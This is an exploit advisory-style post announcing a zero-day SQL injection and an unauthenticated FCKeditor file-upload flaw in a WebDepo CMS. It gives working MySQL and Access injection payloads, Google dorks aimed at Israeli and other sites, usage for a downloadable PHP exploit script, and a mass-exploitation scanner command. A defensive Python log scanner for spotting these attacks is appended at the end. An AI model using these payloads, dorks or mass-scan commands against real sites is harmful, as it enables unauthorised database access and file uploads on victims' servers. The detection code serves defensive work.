EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
While researching file_upload on the web, I discovered a CMS from the Israeli company WebDepo. It has an unauthenticated file_upload flaw, but while analyzing its GET requests I observed that it also has SQLi flaws in its GET parameters.
AUTHOR: GoogleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
VENDOR: http://www.webdepot.co.il
GET VULN: wood=(id) / $wood=intval($_REQUEST['wood'])
-----------------------------------------------------------------------------
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
-----------------------------------------------------------------------------
http://target.us/text.asp?wood=(id)+Exploit
GOOGLE DORK: inurl:"text.asp?wood="
GOOGLE DORK: site:il inurl:"text.asp?wood="
GOOGLE DORK: site:com inurl:"text.asp?wood="
Exploit:
Execute exploit:
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
DOWNLOAD Exploit: http://pastebin.com/b6bWuw7k
-----------------------------------------------------------------------------
EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --command-all "php 0dayWebDepo.php -t '_TARGET_'"
DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
-----------------------------------------------------------------------------
The second flaw:
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[2] - http://target.us/userfiles/file/{YOU_FILE}
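Both flaws leave recognisable traces in web-server logs. The following is an added example, not part of the original post or the author's tools: it scans IIS W3C log lines for `wood` values that are not plain integers and for requests reaching the FCKeditor file-manager path. The log lines, the `site-admin` prefix and the `scan` function name are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in IIS W3C extended format (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-06-01 10:00:01 198.51.100.7 GET /text.asp wood=12 200
2015-06-01 10:00:05 198.51.100.9 GET /text.asp wood=12+AND+(SELECT+1) 500
2015-06-01 10:00:09 198.51.100.9 GET /text.asp WOOD=12%27 500
2015-06-01 10:01:00 203.0.113.4 GET /site-admin/fckeditor/editor/filemanager/browser/default/browser.html Connector=connectors/asp/connector.asp 200
2015-06-01 10:02:00 198.51.100.7 GET /default.asp - 200
"""

INT_RE = re.compile(r"[0-9]+")  # the page treats wood as an integer id
FCK_RE = re.compile(r"/fckeditor/editor/filemanager/", re.I)

def scan(log_text):
    """Return (line_no, client_ip, reason) for each suspicious request."""
    fields, hits = [], []
    for no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "")
        if FCK_RE.search(stem):
            # The file manager should not be reachable without authentication.
            hits.append((no, rec.get("c-ip"), "fckeditor-filemanager"))
            continue
        if stem.lower().endswith("/text.asp"):
            # ASP parameter names are case-insensitive; values are URL-decoded here.
            for key, value in parse_qsl(query, keep_blank_values=True):
                if key.lower() == "wood" and not INT_RE.fullmatch(value):
                    hits.append((no, rec.get("c-ip"), "non-integer-wood"))
                    break
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```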